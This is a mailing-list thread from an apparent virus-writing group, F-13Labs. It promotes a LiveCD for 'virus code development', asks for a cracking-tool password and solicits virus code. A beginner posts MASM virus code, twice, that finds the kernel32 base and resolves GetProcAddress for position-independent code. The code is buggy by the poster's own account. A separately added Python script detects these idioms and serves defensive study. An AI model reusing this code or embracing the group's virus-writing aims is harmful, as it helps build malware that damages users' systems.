Get the Skype software, install it and register one ID. I create the chatting
room. Search and add me, lclee_vx. I will add you to the chatting room list.
Thanks
This is another version of the F-13 LiveCD, version 0.1. The tools included
are as below:
1. Compiler: fasm, nasm, masm, tasm
2. Debugger: OllyICE [modified version of OllyDebug, includes unpack
scripts], IDA Pro [Free Version]
3. Antivirus: Nod32 [Just for checking/scanning your new virus]
4. Assembly Editor: RadASM
5. Network: fport, sniffer, tcpview, wpe [check the network spreading
of your new virus]
6. PE Tool: APIscan, heapmemview [32bit], heapmemview-x64 [64bit],
hexworkshop, lordPE, stud_PE, PEiD, Winhex...
The main purpose of this LiveCD is to develop the virus and create a safe
environment for you to code the vx. Hmm... I am planning to include
the virus sample, utilities, virus library [the routine of retrieve
kernel32 address, api scanning etc] in the next version.
Any ideas and comments [good or bad], please let me know.
http://www.f13-labs.net/tool/F13-LiveCD/F13LiveCD.htm
Happy virus code!!
----- Original Message ----
From: Jay <silverspirit71@...>
To: F-13Labs@yahoogroups.com
Sent: Sunday, March 2, 2008 11:16:20 PM
Subject: [F-13Labs] password needed
hi Group
this group i was looking for
any 1 can help me in this
the site http://www.f13-labs.net
have this tool
PEid + Plugins + Tools [Download]
Note: This PEid tool is famous in cracking stuff. The archive
include all the plugins and unpack/signature creator tool inside.
Complete.
Anyhow, this tool is for member only, ask the password
in "Gathering" forum.
i need the pass for rar file plzzzzzzzzz
sweet!
I'ma start a new code for this probably in visual basic...
when I have my ideas made I'll either write you my information/ideas
or post them here....either way
you'll hear from me soon!
--- In F-13Labs@yahoogroups.com, lclee_vx <lclee_vx@...> wrote:
>
> we are welcome any vx (virus) codes & ideas
>
>
> ----- Original Message ----
> From: b00t_wizard <b00t_wizard@...>
> To: F-13Labs@yahoogroups.com
> Sent: Saturday, December 29, 2007 11:59:37 AM
> Subject: [F-13Labs] Re: New Ezine
>
> any room for :
> visual basic/studio programming , net &/or software background ethics
> let me know!
>
> --- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
> >
> > Dear F-13 members,
> >
> > I am planning to come out the new Ezine for 2008, what say you?
> >
> >
> > from lclee_vx
> >
any room for :
visual basic/studio programming , net &/or software background ethics
let me know!
--- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
>
> Dear F-13 members,
>
> I am planning to come out the new Ezine for 2008, what say you?
>
>
> from lclee_vx
>
Definitely useful & a great idea!
--- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
>
> This is the windows LiveCD, i include the famous asm compiler such as
> masm32, tasm32, nasm32 and fasm32, OllyDebug and ASM editor.
>
> Just download and burn into cd and boot the cd.
>
> I created this LiveCD for virus code development and virus analysis
> purposes.
>
> will add other tool and functions soon.
>
> any comment, good or bad please let me know.
>
> http://www.f13-labs.net/tool/F13-LiveCD/F13LiveCD.htm
>
>
> from lclee_vx/F-13 & lychan25/F-13
>
This is the windows LiveCD, i include the famous asm compiler such as
masm32, tasm32, nasm32 and fasm32, OllyDebug and ASM editor.
Just download and burn into cd and boot the cd.
I created this LiveCD for virus code development and virus analysis
purposes.
will add other tool and functions soon.
any comment, good or bad please let me know.
http://www.f13-labs.net/tool/F13-LiveCD/F13LiveCD.htm
from lclee_vx/F-13 & lychan25/F-13
Let's do it :)
--- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
>
> Dear F-13 members,
>
> I am planning to come out the new Ezine for 2008, what say you?
>
>
> from lclee_vx
>
--- In F-13Labs@yahoogroups.com, <silence_vx@...> wrote:
>
> hi sanzilla jackcat
> i had read your code and find some code is unuseful !!!
> i post code which is also to search APIS
> i hope it can help you ^-^
Thanks man, I got the code. Man, how to find other virus crews on
IRC? What are the servers and what are the usernames and passwords,
man? How to find some real virus source code analysis with a few
more comments, man? Are you on IRC? Chat?
Hai,
I did not go through the details of your code (busy with study
now)... anyhow, just my opinion, refer to the following code:
XPKernel32BaseAddress equ 77E60000h
As I know, you tried to fix the kernel32 base address... this may
cause the exception when the code is not successful in looking for the
right address.
Try adding another routine to search for the kernel32.dll base address
random... refer to my article, the checksum technique...
Cheers...
and nice code !!
I will study your code again and get back to you :)
--- In F-13Labs@yahoogroups.com, "sandundhammikaperera"
<sandundhammikaperera@...> wrote:
>
> man I read the articles and found out the ways to get the kernel32
> base address with the hardcoded method and I did some GetProcAddress
> search. But the problem in this is I got an exception. Why was
> that?
> My code is this.
> First I wrote the code, but the variables in the code segment are
> read only, thus I changed that segment's attributes and tried again.
> Then when I debug it in ollydebug it fails when it scans
> the 2Dh element of the export table of the Kernel32.dll what a fuck
> is this? Please help me man please ... Please ... I'm very curious
> now. I just can't breathe without assembly now. Please man help me
> give me some drugs.
>
>
> This is my source code .
> ------------------------------------------------code begins ------
>
> .586
> .model flat , stdcall
> option casemap : none
> include c:\masm32\include\kernel32.inc
> includelib c:\masm32\lib\kernel32.lib
> include c:\masm32\include\user32.inc
> includelib c:\masm32\lib\user32.lib
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> .code
> start:
> call GetDelta
> GetDelta:
> pop ebp
> sub ebp , OFFSET GetDelta - OFFSET start
> XPKernel32BaseAddress equ 77E60000h
> mov eax , XPKernel32BaseAddress
> call CheckForK32
> cmp eax , 0000000h
> jne ExitLoop
> mov eax , XPKernel32BaseAddress
> call GetApiAddress
> ;; now we are going to print a messageBox
> invoke ExitProcess , 0
>
>
>
>
>
> ExitLoop:
> ;; return to the host code in our virus .
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> CheckForK32 proc
> cmp word ptr [ eax ] , 'ZM'
> jne NotFound
> add eax , 3ch
> mov eax , [eax]
> add eax , XPKernel32BaseAddress
> cmp word ptr [ eax ] , 'EP'
> jne NotFound
> xor eax , eax
> ret
> NotFound:
> ;; die
> CheckForK32 endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> aPEHelder dd 0
> aimportDir dd 0
> aAddressTable dd 0
> aNameTable dd 0
> aOrdinalTable dd 0
> nOfExports dd 0
> sGetProcAddress db 'GetProcAddress' ,0
> aGetProcAddress dd 0
>
> GetApiAddress proc
> ;; oky now we have to get the PE real address
> mov eax , [eax+3ch]
> mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
> add eax , XPKernel32BaseAddress
> mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
> ;; now there is PE helder address in the eax
> ;; we shall play with it .
> ;; Then we need is the place where VA of import dir is kept
> ;; it is on the 78h
> add eax , 78h
> mov eax,dword ptr [ eax ]
> add eax , XPKernel32BaseAddress
> push eax
> mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
> ;;oky we are pointed to the import table in eax
> ;; oky then get the addresstableRVA
> add eax , 1ch
> mov eax , [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
> pop eax
> ;; oky now we shoud have the Name PTR table
> push eax
> add eax , 20h
> mov eax , dword ptr [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
> pop eax
> push eax
> ;;Now we should get the Ordinal table
> add eax , 24h
> mov eax , dword ptr [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] , eax
> pop eax
> push eax
> ;; now we have to get nunber of exports
> add eax , 18h
> mov eax , dword ptr [eax]
> mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
> mov ecx , eax
> pop eax
>
> ;; Now we have to search for the APIs , Lets go
> ;; we shoud put the nOfExports to the ecx oky
> ;; virus leavaman sanaseama laba! .
> mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
> ;; now the eax is pointed to the first address of the string name
> mov edx , 0
> lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
> mov ebx , esi
> CheckNext:
> push edx
> shl edx , 2
> add eax , edx
> pop edx
> mov edi , dword ptr [ eax ]
> add edi , XPKernel32BaseAddress
> inc edx
> mov esi , ebx
> CheckByte:
> ;; we have to compare the bytes in EDI with ESI
> cmpsb
> jne CheckNext
> cmp byte ptr [esi] , 0
> je GotIt
> cmp edx , ecx
> je ExitLoop ;; what a shitt this is not kernel32 what a fuck .
> jmp CheckByte
> GotIt:
> ;; oky we now get that shitt . Oky now we have to store this shitt
> ;; its on the count of edx +1
> ;; but in the loop it was already incremented .This is where aAddressTable was need
> mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
> mov eax , [eax]
> push edx
> shl edx , 2
> add eax , edx
> pop edx
> mov eax , [eax]
> mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
> xor eax , eax
> xor edx , edx
> ret
> GetApiAddress endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
> ;;;
> end start
>
> --------------------------------------------------------------------
> please make sure to change the attributes on the segments to full
> access in order to avoid memory access violations under ollydbg.
>
>
> oky man please help me man. I am just a beginner to the assembly
> language and virus writing. I need to go to the hell.
> by : sanzilla jackcat
>
> sandundhammikaperera@...
>
man I read the articles and found out the ways to get the kernel32
base address with the hardcoded method and I did some GetProcAddress
search. But the problem in this is I got an exception. Why was
that?
My code is this.
First I wrote the code, but the variables in the code segment are
read only, thus I changed that segment's attributes and tried again.
Then when I debug it in ollydebug it fails when it scans
the 2Dh element of the export table of the Kernel32.dll what a fuck
is this? Please help me man please ... Please ... I'm very curious
now. I just can't breathe without assembly now. Please man help me
give me some drugs.
This is my source code .
------------------------------------------------code begins ------
.586
.model flat , stdcall
option casemap : none
include c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.code
start:
call GetDelta
GetDelta:
pop ebp
sub ebp , OFFSET GetDelta - OFFSET start
XPKernel32BaseAddress equ 77E60000h
mov eax , XPKernel32BaseAddress
call CheckForK32
cmp eax , 0000000h
jne ExitLoop
mov eax , XPKernel32BaseAddress
call GetApiAddress
;; now we are going to print a messageBox
invoke ExitProcess , 0
ExitLoop:
;; return to the host code in our virus .
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CheckForK32 proc
cmp word ptr [ eax ] , 'ZM'
jne NotFound
add eax , 3ch
mov eax , [eax]
add eax , XPKernel32BaseAddress
cmp word ptr [ eax ] , 'EP'
jne NotFound
xor eax , eax
ret
NotFound:
;; die
CheckForK32 endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
aPEHelder dd 0
aimportDir dd 0
aAddressTable dd 0
aNameTable dd 0
aOrdinalTable dd 0
nOfExports dd 0
sGetProcAddress db 'GetProcAddress' ,0
aGetProcAddress dd 0
GetApiAddress proc
;; oky now we have to get the PE real address
mov eax , [eax+3ch]
mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
add eax , XPKernel32BaseAddress
mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
;; now there is PE helder address in the eax
;; we shall play with it .
;; Then we need is the place where VA of import dir is kept
;; it is on the 78h
add eax , 78h
mov eax,dword ptr [ eax ]
add eax , XPKernel32BaseAddress
push eax
mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
;;oky we are pointed to the import table in eax
;; oky then get the addresstableRVA
add eax , 1ch
mov eax , [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
pop eax
;; oky now we shoud have the Name PTR table
push eax
add eax , 20h
mov eax , dword ptr [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
pop eax
push eax
;;Now we should get the Ordinal table
add eax , 24h
mov eax , dword ptr [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] , eax
pop eax
push eax
;; now we have to get nunber of exports
add eax , 18h
mov eax , dword ptr [eax]
mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
mov ecx , eax
pop eax
;; Now we have to search for the APIs , Lets go
;; we shoud put the nOfExports to the ecx oky
;; virus leavaman sanaseama laba! .
mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
;; now the eax is pointed to the first address of the string name
mov edx , 0
lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
mov ebx , esi
CheckNext:
push edx
shl edx , 2
add eax , edx
pop edx
mov edi , dword ptr [ eax ]
add edi , XPKernel32BaseAddress
inc edx
mov esi , ebx
CheckByte:
;; we have to compare the bytes in EDI with ESI
cmpsb
jne CheckNext
cmp byte ptr [esi] , 0
je GotIt
cmp edx , ecx
je ExitLoop ;; what a shitt this is not kernel32 what a fuck .
jmp CheckByte
GotIt:
;; oky we now get that shitt . Oky now we have to store this shitt
;; its on the count of edx +1
;; but in the loop it was already incremented .This is where aAddressTable was need
mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
mov eax , [eax]
push edx
shl edx , 2
add eax , edx
pop edx
mov eax , [eax]
mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
xor eax , eax
xor edx , edx
ret
GetApiAddress endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
end start
--------------------------------------------------------------------
please make sure to change the attributes on the segments to full
access in order to avoid memory access violations under ollydbg.
oky man please help me man. I am just a beginner to the assembly
language and virus writing. I need to go to the hell.
by : sanzilla jackcat
sandundhammikaperera@...
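
A detection-side view of the listing above, as an added example that is not part of the original post: a Python sketch that scans a raw byte buffer for the idioms the posted code relies on (call/pop delta offset, a hardcoded 64 KB-aligned module base such as 77E60000h, in-memory MZ/PE signature compares, and an embedded GetProcAddress string). The address range, the scoring threshold and the sample bytes are assumptions constructed for illustration.

```python
import re
import struct

# 32-bit x86 encodings of the idioms seen in the posted listing.
DELTA = re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5b\x5d-\x5f]")  # call $+5 ; pop r32
CMP_MZ = re.compile(rb"\x66\x81[\x38-\x3b\x3e\x3f]\x4d\x5a")      # cmp word ptr [r32], 'ZM'
CMP_PE = re.compile(rb"\x66\x81[\x38-\x3b\x3e\x3f]\x50\x45")      # cmp word ptr [r32], 'EP'
# Lookahead so overlapping candidates are all examined: mov r32, imm32
MOV_IMM = re.compile(rb"(?=[\xb8-\xbf](.{4}))", re.DOTALL)
API_NAME = re.compile(rb"GetProcAddress\x00")

# Assumed heuristic range for system DLL bases on 32-bit Windows without ASLR.
BASE_LO, BASE_HI = 0x70000000, 0x80000000


def scan(buf: bytes) -> dict:
    """Return the offsets of each indicator found in buf."""
    hits = {
        "delta_offset": [m.start() for m in DELTA.finditer(buf)],
        "mz_check": [m.start() for m in CMP_MZ.finditer(buf)],
        "pe_check": [m.start() for m in CMP_PE.finditer(buf)],
        "api_name": [m.start() for m in API_NAME.finditer(buf)],
        "hardcoded_base": [],
    }
    for m in MOV_IMM.finditer(buf):
        (imm,) = struct.unpack("<I", m.group(1))
        # Module bases are 64 KB aligned, so the low 16 bits are zero.
        if imm & 0xFFFF == 0 and BASE_LO <= imm < BASE_HI:
            hits["hardcoded_base"].append((m.start(), hex(imm)))
    return hits


def suspicious(hits: dict) -> bool:
    """Flag position-independent code that also walks a module by hand."""
    others = sum(bool(v) for k, v in hits.items() if k != "delta_offset")
    return bool(hits["delta_offset"]) and others >= 2  # threshold is an assumption


# Constructed sample: call/pop ebp, mov eax,77E60000h, the two compares, ret, string.
SAMPLE = bytes.fromhex(
    "e8000000005d b80000e677 6681384d5a 6681385045 c3"
) + b"GetProcAddress\x00"
# Constructed benign sample: push ebp; mov ebp,esp; mov eax,1; pop ebp; ret
BENIGN = bytes.fromhex("558becb8010000005dc3")

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE), ("benign", BENIGN)):
        result = scan(blob)
        print(name, suspicious(result), result)
```

Legitimate packers and protectors use some of the same idioms, so a hit is a triage signal for closer analysis rather than a verdict.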